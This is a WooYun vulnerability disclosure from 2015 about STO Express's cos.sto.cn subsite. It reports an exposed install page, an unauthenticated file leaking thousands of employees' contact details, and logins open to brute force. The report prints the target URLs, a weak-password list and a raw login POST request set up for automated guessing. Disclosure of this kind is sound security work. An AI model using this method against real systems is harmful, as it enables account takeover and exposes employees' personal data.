当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141544

漏洞标题:申通快递某分站设计缺陷,导致大量敏感信息泄露

相关厂商:申通快递

漏洞作者: 路人甲

提交时间:2015-09-16 22:46

修复时间:2015-11-05 08:34

公开时间:2015-11-05 08:34

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-16: 细节已通知厂商并且等待厂商处理中
2015-09-21: 厂商已经确认,细节仅向厂商公开
2015-10-01: 细节向核心白帽子及相关领域专家公开
2015-10-11: 细节向普通白帽子公开
2015-10-21: 细节向实习白帽子公开
2015-11-05: 细节向公众公开

简要描述:

RT

详细说明:

第一处缺陷
http://cos.sto.cn:89/manager/install/welcome.jsp
可能导致应用重装

Snap135.jpg


第二处
未授权访问
泄露大量内部人员信息
http://cos.sto.cn/messager/users.data

Snap136.jpg


base64解码

Snap142.jpg


电话、手机、邮箱等信息泄露
大概有八千多个员工
loginid就是登陆的用户名
可以用来登陆
http://cos.sto.cn/login/Login.jsp?logintype=1
这个系统虽然加了验证

Snap143.jpg


但是有10次机会
而且每个用户都是如此
密码用.

123456
123456789
111111
666666
888888
000000
0000
1111
1234


做测试
也足够了
而且http://cos.sto.cn:89/m1/login.do
这个系统无任何验证
可以进行无限制爆破

http://cos.sto.cn:89/m1/login.do?message=Login.nouser


表示无此用户

http://cos.sto.cn:89/m1/login.do?message=Login.pswerror


表示密码错误

http://cos.sto.cn:89/m1/home.do


表示登录成功
抓包

POST /m1/verifyLogin.do HTTP/1.1
Host: cos.sto.cn:89
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://cos.sto.cn:89/m1/login.do
Cookie: td_cookie=327984015; _ati=5777500816711; td_cookie=101777900; JSESSIONID=abcxxxxx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
userName=§%E7%8E%8B%E7%AB%8B%E6%9D%B0§&password=§a§&language=zh&__checkbox_savecookie=true


Snap146.jpg


一共有2984个账号可以登录
随便登录一个

Snap147.jpg


Snap148.jpg


通讯录
http://cos.sto.cn//hrm/report/HrmRpContactResult.jsp

Snap149.jpg


这个应该就是user.data中的数据
各种通讯录

Snap153.jpg


Snap154.jpg


车辆预报信息及晚点车辆信息查询

Snap150.jpg


Snap151.jpg


漏洞证明:

http://cos.sto.cn:89/manager/install/welcome.jsp
可能导致应用重装

Snap135.jpg


未授权访问
泄露大量内部人员信息
http://cos.sto.cn/messager/users.data
密码采用

123456
123456789
111111
666666
888888
000000
0000
1111
1234


爆破登录

Snap146.jpg


一共有2984个账号可以登录

Snap147.jpg


Snap148.jpg


通讯录
http://cos.sto.cn//hrm/report/HrmRpContactResult.jsp

Snap149.jpg


修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-09-21 08:32

厂商回复:

谢谢,我们尽快修复

最新状态:

暂无